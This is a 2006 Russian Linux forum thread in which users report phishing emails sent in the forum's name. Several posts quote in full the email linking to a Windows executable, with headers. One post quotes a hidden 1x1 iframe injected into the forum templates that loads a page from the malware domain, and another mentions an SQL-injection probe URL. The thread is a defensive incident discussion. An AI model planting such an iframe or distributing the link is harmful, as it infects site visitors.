От имени linuxforum рассылают * (Стоит проверить, не взломан ли форум)

Внимание! Если у вас проблемы с регистрацией, пишем сюда свои жалобы.
Если вас что-то не устраивает, вы нашли ошибку или хотите что-то предложить - Пишите сюда, ваша просьба обязательно будет рассмотрена!

Модератор: Модераторы разделов

Аватара пользователя
powerfox
Сообщения: 458
Контактная информация:

От имени linuxforum рассылают *

Сообщение powerfox »

Вот, что мне пришло на мэил:
нР: "LinuxForum" <support@linuxforum.ru>
йНЛС: ***********************
дЮРЮ: 10 хЧК 2006 23:07:02
рЕЛЮ: linuxforum.ru ( LinuxForum )




Уважаемый(ая) powerfox.

Вышла офлайн версия форума. Доступ можно получить тут http://zdfttygzjm.biz/dl/loadadv586.exe

-------------------------------------
Статистика форума "LinuxForum":
-------------------------------------
Всего пользователей зарегистрировано: 6033
Всего оставлено сообщений: 221192
Рекорд посещаемости: 569 пользователей было 17th April 2006 - в 15:13

-------------------------------------
Удобные ссылки
-------------------------------------
Адрес форума: http://linuxforum.ru/index.php
Войти на форум: http://linuxforum.ru/index.php?act=Login&CODE=00
Восстановление утерянного пароля: http://linuxforum.ru/index.php?act=Reg&CODE=10

-------------------------------------
Как отписаться от рассылок?
-------------------------------------
Пожалуйста, измените в вашем профиле (http://linuxforum.ru/index.php?act=UserCP&CODE=02) настройки e-mail и уберите галочку 'Сообщать мне обо всех изменениях, проводимых администратором форума'.


Причём в той же кодировке, что и письма от форума, причём в koi8-r рассылка стала недавно.
Смешным показался формат файла, иначе бы сразу щёлкнул не думая...
Спасибо сказали:
Аватара пользователя
nerezus
Сообщения: 525
Статус: Вселенский отказник
ОС: windoze

Re: От имени linuxforum рассылают *

Сообщение nerezus »

Кто-то базу слил...
Кстати, ipb - нереально дырявый движок <_<
ICQ 547097
Спасибо сказали:
Аватара пользователя
KiWi
Бывший модератор
Сообщения: 2521
Статус: статус, статус, статус
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение KiWi »

nerezus писал(а):
10.07.2006 23:35
Кстати, ipb - нереально дырявый движок <_<

А на другой принципиально переходить не собирались.
Спасибо сказали:
Pieron
Сообщения: 51

Re: От имени linuxforum рассылают *

Сообщение Pieron »


какая то 6-кбайтовая бяка(вирус). Под wine, как и следовало ожидать, не завелась :)

мне вот стало интересно - сколько надо иметь мозгов чтобы отсылать это линуксоидам? :)
Спасибо сказали:
Аватара пользователя
sergius
Сообщения: 782

Re: От имени linuxforum рассылают *

Сообщение sergius »

Тут скорее робот работает. Ищет форумы на определенном движке, использует дыру. И рассылает мессаги.
Спасибо сказали:
Аватара пользователя
Vidoc
Сообщения: 231
ОС: Gentoo ~x86

Re: От имени linuxforum рассылают *

Сообщение Vidoc »

О, мне только что то же самое пришло! :velho:
Спасибо сказали:
Аватара пользователя
keir
Сообщения: 317
ОС: linux
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение keir »

Мне было прислано подобное письмо:

Код: Выделить всё

От: support@linuxforum.ru LinuxForum
Кому: keir.ru@gmail.com
Дата: Mon, 10 Jul 2006 23:38:05 +0400
Тема: linuxforum.ru ( LinuxForum )


Уважаемый(ая) keir.

Вышла офлайн версия форума. Доступ можно получить тут http://zdfttygzjm.biz/dl/loadadv586.exe

-------------------------------------
Статистика форума "LinuxForum":
-------------------------------------
Всего пользователей зарегистрировано: 6033
Всего оставлено сообщений: 221201
Рекорд посещаемости: 569 пользователей было 17th April 2006 - в 15:13

-------------------------------------
Удобные ссылки
-------------------------------------
Адрес форума: http://linuxforum.ru/index.php
Войти на форум: http://linuxforum.ru/index.php?act=Login&CODE=00
Восстановление утерянного пароля: http://linuxforum.ru/index.php?act=Reg&CODE=10

-------------------------------------
Как отписаться от рассылок?
-------------------------------------
Пожалуйста, измените в вашем профиле (http://linuxforum.ru/index.php?act=UserCP&CODE=02) настройки e-mail и уберите галочку 'Сообщать мне обо всех изменениях, проводимых администратором форума'.


Кто может объяснить сие чудо?
Trust №1
Спасибо сказали:
Аватара пользователя
mark
Бывший модератор
Сообщения: 2055
Статус: ...
ОС: Windows 7
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение mark »

Спасибо сказали:
Аватара пользователя
rws
Сообщения: 206
ОС: Ubuntu 7.10

Re: От имени linuxforum рассылают *

Сообщение rws »

X-Gmail-Received: 4bc734a558216de5d3f592877b45c18dfa889b24
Delivered-To: xxx@gmail.com
Received: by 10.78.153.8 with SMTP id a8cs72847hue;
Mon, 10 Jul 2006 12:36:47 -0700 (PDT)
Received: by 10.66.221.19 with SMTP id t19mr224299ugg;
Mon, 10 Jul 2006 12:36:46 -0700 (PDT)
Return-Path: <www-154@slon.mezon.ru>
Received: from slon.mezon.ru (host-197-154.netflow.ru [88.212.197.154])
by mx.gmail.com with ESMTP id k30si132969ugc.2006.07.10.12.36.46;
Mon, 10 Jul 2006 12:36:46 -0700 (PDT)
Received-SPF: neutral (gmail.com: 88.212.197.154 is neither permitted nor denied by best guess record for domain of www-154@slon.mezon.ru)
Received: by slon.mezon.ru (Postfix, from userid 500)
id DF2EB412C70; Mon, 10 Jul 2006 23:39:03 +0400 (MSD)
To: xxx@gmail.com
Subject: linuxforum.ru ( LinuxForum )
MIME-Version: 1.0
Content-type: text/plain; charset="windows-1251"
From: "LinuxForum" <support@linuxforum.ru>
X-Priority: 3
X-Mailer: IPB PHP Mailer
X-Unique-ID: 191a6e0c_f1ffe466_72955a6e_7cdd9
Message-Id: <20060710193903.DF2EB412C70@slon.mezon.ru>
Date: Mon, 10 Jul 2006 23:39:03 +0400 (MSD)


Уважаемый(ая) rws.

Вышла офлайн версия форума. Доступ можно получить тут http://zdfttygzjm.biz/dl/loadadv586.exe

-------------------------------------
Статистика форума "LinuxForum":
-------------------------------------
Всего пользователей зарегистрировано: 6033
Всего оставлено сообщений: 221201
Рекорд посещаемости: 569 пользователей было 17th April 2006 - в 15:13

-------------------------------------
Удобные ссылки
-------------------------------------
Адрес форума: http://linuxforum.ru/index.php
Войти на форум: http://linuxforum.ru/index.php?act=Login&CODE=00
Восстановление утерянного пароля: http://linuxforum.ru/index.php?act=Reg&CODE=10

-------------------------------------
Как отписаться от рассылок?
-------------------------------------
Пожалуйста, измените в вашем профиле (http://linuxforum.ru/index.php?act=UserCP&CODE=02) настройки e-mail и уберите галочку 'Сообщать мне обо всех изменениях, проводимых администратором форума'.
AMD Athlon 64 X2 4200+/2GB RAM/250GB HDD/GeForce 7600GT 256MB/ZyXEL P-660RT EE
Спасибо сказали:
VladimirP
Сообщения: 164

Re: От имени linuxforum рассылают *

Сообщение VladimirP »

Мне пришло. Заголовки и ссылка те же.
Спасибо сказали:
Аватара пользователя
nerezus
Сообщения: 525
Статус: Вселенский отказник
ОС: windoze

Re: От имени linuxforum рассылают *

Сообщение nerezus »

Кто-то получил доступ к админке... там же наверняка есть раздел для отправки сообщений...

Кстати, в данном движке ло сих пор не закрыты уязвимости. И пожно купить сплоиты, в районе 100 баксов.

Приведу пример: показал специально багу(неудавшаяся SQL-инъекция ввиду intval()), через которую нельзя что-либо сделать: index.php?act=Online&st=-1
Таких безопасных багов в этом форуме туча. Опасных, говорят, не меньше.

Вот что бывает, когда разработчики движка не думают о безопасности.
ICQ 547097
Спасибо сказали:
Аватара пользователя
yros
Сообщения: 245

Re: От имени linuxforum рассылают *

Сообщение yros »

Также пришло. Кодировка koi8, а указана 1251, как и во всех письмах с linuxforum.
Но все-таки каким болваном надобно быть чтобы подсовывать линуксоидам екзешник, утверждая к тому же что он является "офлайн версия форума". Наверное все-таки робот.
myLinux 3.1 | 2.6.17.6
Спасибо сказали:
Аватара пользователя
GRS
Сообщения: 236
Статус: C++ Pro
ОС: Suse10.2/XP

Re: От имени linuxforum рассылают *

Сообщение GRS »

Хорошо посмеялся, посмотрев на адрес exe-шника. Где они только собираются таких искать. Одно обидно, мейл вскрыт - жди спама.
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение Sonic »

(GRS @ Jul 11 2006, в 12:26) писал(а):Одно обидно, мейл вскрыт - жди спама.

Я думаю, не всё так плохо, рассылали стандартыми функциями форума. Вроде как получили доступ к админки. Хотя там уже можно свободно вытащить всю базу :(
Вот такая строчка появилась в шаблонах внизу. Следует полагать, что были в админки.
<iframe src="http://zdfttygzjm.biz/dl/adv586.php" width=1 height=1></iframe>
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
Аватара пользователя
Kot-Mulder
Сообщения: 99

Re: От имени linuxforum рассылают *

Сообщение Kot-Mulder »

Аналогично. Вид заразы - TR/Crypt.F.Gen
Правды нет, есть только свое мнение (с)
Спасибо сказали:
Гость
Предупреждения: 0

Re: От имени linuxforum рассылают *

Сообщение Гость »

И мне пришло.
Спасибо сказали:
Chapaev
Сообщения: 3

Re: От имени linuxforum рассылают *

Сообщение Chapaev »

Мессага выше - моя. =)
Спасибо сказали:
Аватара пользователя
muhas
Сообщения: 185
Статус: ленивый арчевод
ОС: Archlinux i686 Current
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение muhas »

Прочитал эту тему и успокоился, а то сначала испугался, думал админы форума с ума свехнулися ехе'шники шлют
Реальность многогранна поэтому не может быть той правдой, которая «всего одна».
Спасибо сказали:
Аватара пользователя
Navy Genie
Сообщения: 57
ОС: Fedora Core
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение Navy Genie »

Хех я тоже пришел спрашивать что за экзешник и чем мне его прикажут открывать , вот уж не ожидал что это вирусятина :)
Каждый сам роет себе карьеру
Спасибо сказали:
Аватара пользователя
Мак Сим
Сообщения: 231
ОС: Ubuntu 9.04
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение Мак Сим »

Забыли приложить описание как запустить виндовый вирус под эхотагом...:(
2:5020/8086.465
Мой открытый PGP-ключ тут
Dell Inspiron 2200 - Debian(testing)
Спасибо сказали:
Аватара пользователя
valeri_ufo
Бывший модератор
Сообщения: 274
Статус: Everywhere, yet nowhere

Re: От имени linuxforum рассылают *

Сообщение valeri_ufo »

Админам всё же стоило бы вывесить надпись красную такую, где написано что пароль стоит поменять.
Спасибо сказали:
Аватара пользователя
nerezus
Сообщения: 525
Статус: Вселенский отказник
ОС: windoze

Re: От имени linuxforum рассылают *

Сообщение nerezus »

Админам всё же стоило бы вывесить надпись красную такую, где написано что пароль стоит поменять.
Не пароль, а мыло :(
Но пофигу, все равно засветится...
ICQ 547097
Спасибо сказали:
Аватара пользователя
Мак Сим
Сообщения: 231
ОС: Ubuntu 9.04
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение Мак Сим »

Движок форума надо менять :)
2:5020/8086.465
Мой открытый PGP-ключ тут
Dell Inspiron 2200 - Debian(testing)
Спасибо сказали:
Аватара пользователя
edoc_modnar
Бывший модератор
Сообщения: 1638
Статус: Форум больше не посещаю

Re: От имени linuxforum рассылают *

Сообщение edoc_modnar »

Sonic, маладец млин, что сказать...
So long, and thanks for all the fish.
Douglas Adams, The Hitchhiker's Guide to the Galaxy
Спасибо сказали:
Аватара пользователя
Sonic
Сообщения: 478
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение Sonic »

(random_code @ Jul 11 2006, в 19:03) писал(а):Sonic, маладец млин, что сказать...

Что не так?
LinuxForum.ru :: Форум пользователей ОС Linux
Спасибо сказали:
goood
Сообщения: 46

Re: От имени linuxforum рассылают *

Сообщение goood »

nerezus писал(а):
11.07.2006 14:07
Админам всё же стоило бы вывесить надпись красную такую, где написано что пароль стоит поменять.
Не пароль, а мыло :(
Но пофигу, все равно засветится...

вообще-то лучше и пароль и мыло.
Дыру наверняка уже подлатали.
Спасибо сказали:
Аватара пользователя
nerezus
Сообщения: 525
Статус: Вселенский отказник
ОС: windoze

Re: От имени linuxforum рассылают *

Сообщение nerezus »

Дыру наверняка уже подлатали.
Я показал пример, которому уже чуть ли не полгода. До сих пор не поправили.

//часть поста удалил
ICQ 547097
Спасибо сказали:
Аватара пользователя
muhas
Сообщения: 185
Статус: ленивый арчевод
ОС: Archlinux i686 Current
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение muhas »

кстати никто не был по адресу http://zdfttygzjm.biz/ - тама
Fedora Core Test Page

This page is used to test the proper operation of the Apache HTTP server after it has been installed. If you can read this page, it means that the Apache HTTP server installed at this site is working properly.

По ходу это какой-то ненавистник винды решил застебать виндузятников обитающих на этом форуме ;)
Реальность многогранна поэтому не может быть той правдой, которая «всего одна».
Спасибо сказали:
Аватара пользователя
KiWi
Бывший модератор
Сообщения: 2521
Статус: статус, статус, статус
Контактная информация:

Re: От имени linuxforum рассылают *

Сообщение KiWi »

Sonic писал(а):
11.07.2006 15:08
(random_code @ Jul 11 2006, в 19:03) писал(а):
Sonic, маладец млин, что сказать...

Что не так?

А теперь вопрос(ну, может мнение изменилось):
Будет ли произведена смена движка? На тот же vBulletin?
Спасибо сказали:
Аватара пользователя
nerezus
Сообщения: 525
Статус: Вселенский отказник
ОС: windoze

Re: От имени linuxforum рассылают *

Сообщение nerezus »

IFL писал(а):
11.07.2006 16:20
А теперь вопрос(ну, может мнение изменилось):
Будет ли произведена смена движка? На тот же vBulletin?

vB тоже платный.... правда он подешевле, чем IPB, да и возможностей поболее у него...
ICQ 547097
Спасибо сказали:
Ответить